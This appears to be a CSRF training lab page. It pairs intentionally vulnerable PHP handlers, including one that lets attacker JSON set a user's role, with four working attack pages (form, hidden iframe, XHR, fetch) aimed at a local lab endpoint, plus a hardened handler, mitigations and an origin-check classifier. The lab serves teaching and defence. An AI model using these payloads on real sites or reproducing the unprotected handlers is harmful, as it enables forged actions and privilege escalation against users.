Lab 5: Advanced CSRF Techniques

Complex techniques to bypass modern protections

Difficulty: High

Lab Overview

This lab demonstrates CSRF against endpoints that accept cookie-authenticated POST requests without any anti-CSRF check. The same flaw is exercised four ways: a plain HTML form, a form submitted into a hidden iframe, an XMLHttpRequest, and a fetch() call. None of these defeats a correctly implemented token or SameSite defence on its own; they are different ways of making the victim's browser send a state-changing request that the server cannot tell apart from a legitimate one, because it trusts the session cookie alone. The script-based variants matter because they are silent (the victim's tab never navigates) and because a form-encoded POST is a CORS "simple request": the browser sends it without a preflight, so defences that rely on CORS, or that only protect visible HTML forms, do not stop it even though the attacker's page is never allowed to read the response.

Objective: Use advanced CSRF techniques to bypass modern security protections and perform unauthorized actions.

Vulnerable Code
// Vulnerable: No CSRF protection on advanced endpoints
session_start();
$user_profile = $_SESSION['user_profile'] ?? [];

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['advanced_csrf'])) {
    $action = $_POST['action'] ?? '';
    $data = $_POST['data'] ?? '';

    // Process action without CSRF validation: no token and no Origin/Referer
    // check, so any cross-site page can trigger this with the victim's cookie
    if ($action === 'update_profile') {
        $profile_data = json_decode($data, true) ?? [];
        // array_merge() copies every key the attacker supplied, including
        // "role", so the same request can also escalate privileges
        $_SESSION['user_profile'] = array_merge($user_profile, $profile_data);
    }
}

// Vulnerable: Iframe-based CSRF
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['iframe_csrf'])) {
    $action = $_POST['action'] ?? '';
    $data = $_POST['data'] ?? '';
    // Process iframe-based attack without validation
}

// Vulnerable: XHR-based CSRF
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['xhr_csrf'])) {
    $action = $_POST['action'] ?? '';
    $data = $_POST['data'] ?? '';
    // Process XHR-based attack without validation
}
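The hardened handler below is an added example and is not the lab's code; it applies the mitigations listed at the end of this page to the advanced_csrf endpoint: a SameSite=Lax session cookie, a per-session synchronizer token compared in constant time, and an allowlist of the profile fields a user may change. The names csrf_token(), csrf_check(), merge_profile() and ALLOWED_PROFILE_FIELDS are this example's own, and the rendered form assumes the page lives at /test/csrf/5.php as in the payloads.

```php
<?php
// Added example (not part of the lab): hardened replacement for the
// advanced_csrf handler in 5.php. Helper names are this example's own.
declare(strict_types=1);

// 1. Session cookie: SameSite=Lax means the cross-site POSTs from the attack
//    pages are sent without the session cookie at all. Browsers still attach
//    Lax cookies to top-level GET navigations, so this alone is not enough.
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => isset($_SERVER['HTTPS']),   // always true in production
    'httponly' => true,
    'samesite' => 'Lax',
]);
session_start();

// 2. Synchronizer token: one random 256-bit value per session, embedded in
//    every state-changing form and checked with hash_equals() so that the
//    comparison does not leak timing information.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_check($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return is_string($submitted)
        && $expected !== ''
        && hash_equals($expected, $submitted);
}

// 3. Field allowlist: the vulnerable array_merge() lets attacker JSON overwrite
//    "role" (the payloads on this page do exactly that). Only fields a user
//    may legitimately edit are copied across.
const ALLOWED_PROFILE_FIELDS = ['username', 'email'];

function merge_profile(array $current, array $submitted): array
{
    foreach (ALLOWED_PROFILE_FIELDS as $field) {
        if (isset($submitted[$field]) && is_string($submitted[$field])) {
            $current[$field] = $submitted[$field];
        }
    }
    return $current;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['advanced_csrf'])) {
    if (!csrf_check($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('CSRF token missing or invalid');
    }

    $action = $_POST['action'] ?? '';
    $data   = json_decode($_POST['data'] ?? '', true);

    if ($action === 'update_profile' && is_array($data)) {
        $_SESSION['user_profile'] = merge_profile(
            $_SESSION['user_profile'] ?? [],
            $data
        );
    }
}

// The legitimate form carries the token. An attacker's page on another origin
// cannot read it, so it cannot forge a request that passes csrf_check().
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
echo <<<HTML
<form method="POST" action="/test/csrf/5.php">
  <input type="hidden" name="advanced_csrf" value="1">
  <input type="hidden" name="action" value="update_profile">
  <input type="hidden" name="csrf_token" value="{$token}">
  <input type="text" name="data" value='{"username": "victim_user"}'>
  <input type="submit" value="Update profile">
</form>
HTML;
```

With this in place the four payloads on this page fail for two independent reasons: the browser withholds the Lax session cookie from the cross-site POST, and even a request that did carry the cookie is rejected with 403 because it has no csrf_token field. The allowlist is a separate fix for a separate problem (mass assignment of role), which a CSRF token alone would not address.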
Attack Status

The lab page shows the victim's current profile and an attack log that starts empty:

Username: victim_user
Email: victim@example.com
Role: user
Balance: $1,000.00

Attack Log (0): no attacks detected yet.

The page offers one trigger per technique: Advanced CSRF Attack, Iframe CSRF Attack, XHR CSRF Attack and Fetch CSRF Attack.
Vulnerability Details
  • Type: Advanced CSRF Techniques
  • Severity: Critical
  • Method: POST
  • Issue: No CSRF protection on advanced endpoints
Advanced Attack Examples
  • advanced_csrf.html - Basic advanced CSRF
  • iframe_csrf.html - Iframe-based attack
  • xhr_csrf.html - XMLHttpRequest attack
  • fetch_csrf.html - Fetch API attack
Advanced CSRF Attack Payloads

Create these malicious HTML files and serve them from a web server on an origin other than the lab's (opening them from file:// gives a null origin, which some browsers treat differently). Note that current browsers treat a cookie with no SameSite attribute as Lax, so a cross-site POST will not carry the lab's session cookie unless that cookie is set with SameSite=None; Secure, or the attack page is same-site with the lab (another port on localhost counts as same-site, because the port is not part of the site). The script-based payloads additionally need credentials enabled explicitly, as shown below.

1. Advanced CSRF Attack (advanced_csrf.html):
<html>
<body>
<h1>Advanced CSRF Attack</h1>
<form action="http://localhost/test/csrf/5.php" method="POST">
  <input type="hidden" name="advanced_csrf" value="1">
  <input type="hidden" name="action" value="admin_promote">
  <input type="hidden" name="data" value='{"target": "victim", "role": "admin"}'>
  <input type="submit" value="Execute Attack">
</form>
</body>
</html>
2. Iframe-based CSRF Attack (iframe_csrf.html):
<html>
<body>
<h1>Iframe-based CSRF Attack</h1>
<!-- The hidden iframe receives the POST response, so the victim's tab never
     visibly navigates away from the attacker's page. -->
<iframe name="hiddenFrame" id="hiddenFrame" style="display:none"></iframe>
<script>
  var form = document.createElement('form');
  form.method = 'POST';
  form.action = 'http://localhost/test/csrf/5.php';
  form.target = 'hiddenFrame';   // submit into the hidden frame, not the top window
  var inputs = [
    {name: 'iframe_csrf', value: '1'},
    {name: 'action', value: 'profile_update'},
    {name: 'data', value: '{"username": "hacked_user"}'}
  ];
  inputs.forEach(function (input) {
    var inputElement = document.createElement('input');
    inputElement.type = 'hidden';
    inputElement.name = input.name;
    inputElement.value = input.value;
    form.appendChild(inputElement);
  });
  document.body.appendChild(form);
  // A form submission always carries cookies that SameSite allows; no
  // credentials flag is needed, unlike the XHR and fetch variants.
  form.submit();
</script>
</body>
</html>
3. XMLHttpRequest CSRF Attack (xhr_csrf.html):
<html>
<body>
<h1>XHR CSRF Attack</h1>
<script>
  var xhr = new XMLHttpRequest();
  xhr.open('POST', 'http://localhost/test/csrf/5.php', true);
  // Required: without withCredentials a cross-origin XHR is sent without the
  // victim's session cookie and the request arrives anonymous.
  xhr.withCredentials = true;
  // application/x-www-form-urlencoded is a CORS "simple" content type, so the
  // browser sends the POST without a preflight even though it will refuse to
  // give this page the response.
  xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  var data = 'xhr_csrf=1&action=api_call&data=' +
    encodeURIComponent('{"endpoint": "/api/admin", "method": "POST"}');
  xhr.onreadystatechange = function () {
    if (xhr.readyState === 4) {
      // status is 0 when the browser blocks the cross-origin response; the
      // server has already processed the request by then.
      console.log('XHR CSRF request completed, status ' + xhr.status);
    }
  };
  xhr.send(data);
</script>
</body>
</html>
4. Fetch API CSRF Attack (fetch_csrf.html):
<html>
<body>
<h1>Fetch CSRF Attack</h1>
<script>
  fetch('http://localhost/test/csrf/5.php', {
    method: 'POST',
    // fetch() defaults to credentials: 'same-origin', which omits cookies on a
    // cross-origin request; 'include' is required for the attack to be
    // authenticated as the victim.
    credentials: 'include',
    // no-cors keeps this a simple request (no preflight). The response is
    // opaque to this page, but the server still executes the action.
    mode: 'no-cors',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: 'fetch_csrf=1&action=modern_api&data=' +
      encodeURIComponent('{"query": "mutation { updateUser(id: 1, role: \'admin\') }"}')
  })
  .then(function () { console.log('Fetch CSRF request sent'); })
  .catch(function (err) { console.log('Fetch CSRF request failed: ' + err); });
</script>
</body>
</html>
Real-World Attack Scenarios
Mitigation Strategies
  • Require an anti-CSRF token (per session or per request) on every state-changing endpoint, not only on the visible HTML forms; compare it in constant time and reject the request on mismatch
  • Set session cookies with SameSite=Lax or Strict; do not rely on CORS, which only restricts reading the response and does not stop a simple form-encoded POST from reaching the server
  • Validate the Origin header against an allowlist, falling back to Referer (and using Sec-Fetch-Site where the browser sends it), and reject state-changing requests that carry none of them
  • For JSON and GraphQL-style APIs, authenticate with a bearer token in a custom header rather than a cookie, so that a cross-origin call requires a preflight the browser will not pass
  • Allowlist the fields an action may modify (the array_merge() above lets an attacker set role) and rate-limit sensitive actions
  • Include CSRF checks in regular security testing and vulnerability assessments
  • Log and alert on state-changing requests whose Origin or Referer is missing or does not match the application's own origin
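The following is an added example, not part of the lab: a request-origin classifier implementing the Origin/Referer/Sec-Fetch-Site check from the list above, run over constructed header sets modelled on what a browser sends for the attack pages when they are served from http://evil.example. TRUSTED_ORIGINS, classify_origin() and the sample requests are this example's own assumptions; in the lab it would sit in front of each POST handler, alongside rather than instead of a CSRF token.

```php
<?php
// Added example (not part of the lab): origin validation for state-changing
// requests, plus the verdict a monitoring log would record for each one.
declare(strict_types=1);

// Origins allowed to drive state-changing endpoints (assumed for this example).
const TRUSTED_ORIGINS = ['http://localhost', 'https://app.example'];

/**
 * Decide whether a POST came from our own site.
 * Returns [allowed (bool), reason (string)].
 */
function classify_origin(array $headers): array
{
    // Header names are case-insensitive; normalise before lookup.
    $h = array_change_key_case($headers, CASE_LOWER);

    // Sec-Fetch-Site is set by the browser and cannot be altered by page script.
    $site = $h['sec-fetch-site'] ?? null;
    if ($site === 'cross-site') {
        return [false, 'Sec-Fetch-Site: cross-site'];
    }
    if ($site === 'same-origin' || $site === 'none') {
        // 'none' is a user-initiated navigation (typed URL, bookmark), not a page.
        return [true, "Sec-Fetch-Site: $site"];
    }
    // 'same-site' (another port or subdomain) or no header at all: fall through
    // to an explicit Origin check rather than trusting every sibling origin.

    // Browsers add Origin to every POST, including plain form posts. A sandboxed
    // or file:// page sends "Origin: null", which is simply not on the list.
    if (isset($h['origin'])) {
        return in_array($h['origin'], TRUSTED_ORIGINS, true)
            ? [true, 'Origin allowlisted']
            : [false, 'Origin not allowlisted: ' . $h['origin']];
    }

    // Referer fallback: compare scheme, host and port only; the path is irrelevant.
    if (isset($h['referer'])) {
        $p = parse_url($h['referer']);
        if ($p === false || !isset($p['scheme'], $p['host'])) {
            return [false, 'Referer unparseable'];
        }
        $origin = $p['scheme'] . '://' . $p['host']
                . (isset($p['port']) ? ':' . $p['port'] : '');
        return in_array($origin, TRUSTED_ORIGINS, true)
            ? [true, 'Referer origin allowlisted']
            : [false, 'Referer origin not allowlisted: ' . $origin];
    }

    // No evidence of where the request came from: fail closed for writes.
    return [false, 'no Origin, Referer or Sec-Fetch-Site header'];
}

// Constructed sample requests (not captured traffic), modelled on what a
// current browser sends for the attack pages served from http://evil.example.
$samples = [
    'legitimate same-origin form' => ['Origin' => 'http://localhost', 'Sec-Fetch-Site' => 'same-origin'],
    'advanced_csrf.html (form)'   => ['Origin' => 'http://evil.example', 'Sec-Fetch-Site' => 'cross-site'],
    'xhr_csrf.html / fetch'       => ['Origin' => 'http://evil.example', 'Sec-Fetch-Site' => 'cross-site'],
    'older browser, Referer only' => ['Referer' => 'http://evil.example/iframe_csrf.html'],
    'sandboxed frame'             => ['Origin' => 'null'],
    'headers stripped by proxy'   => [],
];

foreach ($samples as $label => $headers) {
    [$ok, $why] = classify_origin($headers);
    printf("%-30s %s (%s)\n", $label, $ok ? 'ALLOW' : 'BLOCK', $why);
}
```

Only the same-origin form is allowed; every other sample is blocked, including the request with no origin information at all, which is the case that a check written as "reject if Origin is present and wrong" would have let through. The BLOCK lines are also what the lab's attack log should record, with the reason string as the detail.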